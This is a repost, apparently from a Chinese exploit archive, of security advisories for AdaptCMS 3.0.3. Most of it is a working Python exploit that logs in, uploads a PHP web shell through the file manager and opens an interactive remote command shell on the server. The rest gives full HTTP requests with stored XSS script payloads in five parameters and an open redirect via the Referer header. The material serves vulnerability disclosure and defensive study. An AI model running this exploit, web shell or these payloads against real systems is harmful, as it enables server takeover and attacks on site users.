首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AdaptCMS 3.0.3 XSS / Remote Code Execute Vulnerabilities
来源:http://zeroscience.mk 作者:LiquidWorm 发布时间:2015-01-06  
#!/usr/bin/env python
#
#
# AdaptCMS 3.0.3 Remote Command Execution Exploit
#
#
# Vendor: Insane Visions
# Product web page: http://www.adaptcms.com
# Affected version: 3.0.3
#
# Summary: AdaptCMS is a Content Management System trying
# to be both simple and easy to use, as well as very agile
# and extendable. Not only so we can easily create Plugins 
# or additions, but so other developers can get involved.
# Using CakePHP we are able to achieve this with a built-in
# plugin system and MVC setup, allowing us to focus on the
# details and end-users to focus on building their website
# to look and feel great.
#
# Desc: AdaptCMS suffers from an authenticated arbitrary
# command execution vulnerability. The issue is caused due
# to the improper verification of uploaded files. This can
# be exploited to execute arbitrary PHP code by creating
# or uploading a malicious PHP script file that will be
# stored in '\app\webroot\uploads' directory.
#
# Tested on: Apache 2.4.10 (Win32)
#            PHP 5.6.3
#            MySQL 5.6.21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2015-5220
#
#
# 29.12.2014
#
#
  
  
import itertools, mimetools, mimetypes, os
import cookielib, urllib, urllib2, sys, re
  
from cStringIO import StringIO
from urllib2 import URLError
  
piton = os.path.basename(sys.argv[0])
  
def bannerche():
  print """
 o==========================================o
 |                                          |
 |        AdaptCMS RCE Exploit              |
 |                                          |
 |                        ID:ZSL-2015-5220  |
 |  o/                                      |
 +------------------------------------------+
    """
  if len(sys.argv) < 3:
    print '\x20\x20[*] Usage: '+piton+' <hostname> <pathname>'
    print '\x20\x20[*] Example: '+piton+' zeroscience.mk adaptcms\n'
    sys.exit()
  
bannerche()
  
host = sys.argv[1]
path = sys.argv[2]
  
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  
try:
  gettokens = opener.open('http://'+host+'/'+path+'/login')
except urllib2.HTTPError, errorzio:
  if errorzio.code == 404:
    print 'Path error.'
    sys.exit()
except URLError, errorziocvaj:
  if errorziocvaj.reason:
    print 'Hostname error.'
    sys.exit()
  
print '\x20\x20[*] Login please.'
  
tokenfields = re.search('fields]" value="(.+?)" id=', gettokens.read()).group(1)
gettokens = opener.open('http://'+host+'/'+path+'/login')
tokenkey = re.search('key]" value="(.+?)" id=', gettokens.read()).group(1)
  
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
  
login_data = urllib.urlencode({
              '_method' : 'POST',
              'data[User][username]' : username,
              'data[User][password]' : password,
              'data[_Token][fields]' : '864206fbf949830ca94401a65660278ae7d065b3%3A',
              'data[_Token][key]' : tokenkey,
              'data[_Token][unlocked]' : ''
              })
  
login = opener.open('http://'+host+'/'+path+'/login', login_data)
auth = login.read()
for session in cj:
  sessid = session.name
  
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Accessing...'
  
upload = opener.open('http://'+host+'/'+path+'/admin/files/add')
filetoken = re.search('key]" value="(.+?)" id=', upload.read()).group(1)
  
class MultiPartForm(object):
  
    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
      
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary
  
    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return
  
    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return
      
    def __str__(self):
  
        parts = []
        part_boundary = '--' + self.boundary
          
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
          
        parts.extend(
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
          
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)
  
if __name__ == '__main__':
  
    form = MultiPartForm()
    form.add_field('_method', 'POST')
    form.add_field('data[_Token][key]', filetoken)
    form.add_field('data[File][type]', 'edit')
    form.add_field('data[0][File][filename]', '')
    form.add_field('data[0][File][dir]', 'uploads/')
    form.add_field('data[0][File][mimetype]', '')
    form.add_field('data[0][File][filesize]', '')
    form.add_field('data[File][content]', '<?php echo "<pre>"; passthru($_GET[\'cmd\']); echo "</pre>"; ?>')
    form.add_field('data[File][file_extension]', 'php')
    form.add_field('data[File][file_name]', 'thricer')
    form.add_field('data[File][caption]', 'THESHELL')
    form.add_field('data[File][dir]', 'uploads/')
    form.add_field('data[0][File][caption]', '')
    form.add_field('data[0][File][watermark]', '0')
    form.add_field('data[0][File][zoom]', 'C')
    form.add_field('data[File][resize_width]', '')
    form.add_field('data[File][resize_height]', '')
    form.add_field('data[0][File][random_filename]', '0')
    form.add_field('data[File][library]', '')
    form.add_field('data[_Token][fields]', '0e50b5f22866de5e6f3b959ace9768ea7a63ff3c%3A0.File.dir%7C0.File.filesize%7C0.File.mimetype%7CFile.dir')
    form.add_file('data[0][File][filename]', 'filename', fileHandle=StringIO(''))
  
    request = urllib2.Request('http://'+host+'/'+path+'/admin/files/add')
    request.add_header('User-agent', 'joxypoxy 6.0')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()
  
f_loc = '/uploads/thricer.php'
print
  
while True:
  try:
    cmd = raw_input('shell@'+host+':~# ')
    execute = opener.open('http://'+host+'/'+path+f_loc+'?cmd='+urllib.quote(cmd))
    reverse = execute.read()
    pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
    cmdout = pattern.match(reverse)
    print cmdout.groups()[0].strip()
    print
    if cmd.strip() == 'exit':
      break
  except Exception:
    break
  
print 'Session terminated.\n'
  
sys.exit()
  
  
------------------------------------------
  
AdaptCMS 3.0.3 Multiple Persistent XSS Vulnerabilities
  
  
Vendor: Insane Visions
Product web page: http://www.adaptcms.com
Affected version: 3.0.3
  
Summary: AdaptCMS is a Content Management System trying
to be both simple and easy to use, as well as very agile
and extendable. Not only so we can easily create Plugins 
or additions, but so other developers can get involved.
Using CakePHP we are able to achieve this with a built-in
plugin system and MVC setup, allowing us to focus on the
details and end-users to focus on building their website
to look and feel great.
  
Desc: AdaptCMS version 3.0.3 suffers from multiple stored
cross-site scripting vulnerabilities. Input passed to several
POST parameters is not properly sanitised before being returned
to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an
affected site.
  
Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
  
  
Advisory ID: ZSL-2015-5218
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5218.php
  
  
29.12.2014
  
--
  
  
==========================================
 #1 Stored XSS
    POST parameter: data[Category][title]
------------------------------------------
  
POST /adaptcms/admin/categories/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/adaptcms/admin/categories/add
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 279
  
_method=POST&data%5B_Token%5D%5Bkey%5D=851f8e2e973800b2b0635d5157c55369bcade604&data%5BCategory%5D%5Btitle%5D=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&data%5B_Token%5D%5Bfields%5D=14d1551ece2201712436bf482f7e776f422a7966%253A&data%5B_Token%5D%5Bunlocked%5D=
  
  
=======================================
 #2 Stored XSS
    POST parameter: data[Field][title]
---------------------------------------
  
POST /adaptcms/admin/fields/ajax_fields/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/adaptcms/admin/fields/add
Content-Length: 141
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
  
data%5BField%5D%5Bcategory_id%5D=2&data%5BField%5D%5Btitle%5D=%22%3E%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E&data%5BField%5D%5Bdescription%5D=
  
  
=========================
 #3 Stored XSS
    POST parameter: name
-------------------------
  
POST /adaptcms/admin/tools/create_theme?finish=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://localhost/adaptcms/admin/tools/create_theme
Content-Length: 242
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
  
{"basicInfo":{"name":"\"><script>alert(3);</script>","block_active":"","is_fields":"","is_searchable":""},"versions":{"current_version":"1.0","versions":["1.0","111"]},"skeleton":{"controller":false,"model":false,"layout":true,"views":false}}
  
  
===========================================
 #4 Stored XSS
    POST parameter: data[Link][link_title]
-------------------------------------------
  
POST /adaptcms/admin/links/links/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/adaptcms/admin/links/links/add
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 593
  
_method=POST&data%5B_Token%5D%5Bkey%5D=2c5e2f46b5c13a78395b2e79303543cd4d444789&data%5BLink%5D%5Btitle%5D=444&data%5BLink%5D%5Burl%5D=http%3A%2F%2Fzeroscience.mk&data%5BLink%5D%5Blink_title%5D="><script>alert(4);</script>&data%5BLink%5D%5Blink_target%5D=_new&data%5BLink%5D%5Bactive%5D=0&data%5BLink%5D%5Bactive%5D=1&data%5BLink%5D%5Btype%5D=&data%5BLink%5D%5Bimage_url%5D=&data%5BLink%5D%5Bselect_all%5D=0&data%5BLink%5D%5Bselect_none%5D=0&data%5BLink%5D%5Bsort_by%5D=&data%5BLink%5D%5Bsort_direction%5D=&data%5B_Token%5D%5Bfields%5D=34394f00acd7233477b8cd9e681e331f083052a5%253A&data%5B_Token%5D%5Bunlocked%5D=
  
  
==============================================
 #5 Stored XSS
    POST parameter: data[ForumTopic][subject]
----------------------------------------------
  
POST /adaptcms/forums/off-topic/new HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/adaptcms/forums/off-topic/new
Cookie: adaptcms=c4fqklpt7gneokqbbv4iq1e5b1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 460
  
_method=POST&data%5B_Token%5D%5Bkey%5D=4c5428572b6454152377ae8db2c3a8a753f39dba&data%5BForumTopic%5D%5Bsubject%5D=%22%3E%3Cscript%3Ealert%285%29%3B%3C%2Fscript%3E&data%5BForumTopic%5D%5Bcontent%5D=%3Cp%3Etestingcontent%3C%2Fp%3E&data%5BForumTopic%5D%5Btopic_type%5D=topic&data%5BForumTopic%5D%5Bforum_id%5D=1&data%5B_Token%5D%5Bfields%5D=bcff03f6432e544b05d877fcdd8c29f13155693a%253AForumTopic.forum_id%257CForumTopic.topic_type&data%5B_Token%5D%5Bunlocked%5D=
  
--------------------
  
AdaptCMS 3.0.3 HTTP Referer Header Field Open Redirect Vulnerability
  
  
Vendor: Insane Visions
Product web page: http://www.adaptcms.com
Affected version: 3.0.3
  
Summary: AdaptCMS is a Content Management System trying
to be both simple and easy to use, as well as very agile
and extendable. Not only so we can easily create Plugins 
or additions, but so other developers can get involved.
Using CakePHP we are able to achieve this with a built-in
plugin system and MVC setup, allowing us to focus on the
details and end-users to focus on building their website
to look and feel great.
  
Desc: Input passed via the 'Referer' header field is not
properly verified before being used to redirect users.
This can be exploited to redirect a user to an arbitrary
website e.g. when a user clicks a specially crafted link
to the affected script hosted on a trusted domain.
  
====================================
\lib\Cake\Controller\Controller.php:
------------------------------------
Line: 956
..
..
Line: 974
------------------------------------
  
Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
  
  
Advisory ID: ZSL-2015-5219
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5219.php
  
  
29.12.2014
  
--
  
  
GET /adaptcms/admin/adaptbb/webroot/foo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Referer: http://zeroscience.mk
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HikaShop 2.3.3 Local File Incl
·ManageEngine Desktop Central A
·SkinCrafter3_vs2010 ActiveX Ex
·BulletProof FTP Client BPS Buf
·SkinCrafter3_vs2008 ActiveX Ex
·McAfee ePolicy Orchestrator Au
·SkinCrafter3_vs2005 ActiveX Ex
·Microsoft Dynamics CRM 2013 SP
·ASUSWRT 3.0.0.4.376_1071 - LAN
·Pandora 3.1 Auth Bypass / Arbi
·Malicious Git And Mercurial HT
·AVM Fritz!box Auto Exploiter
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved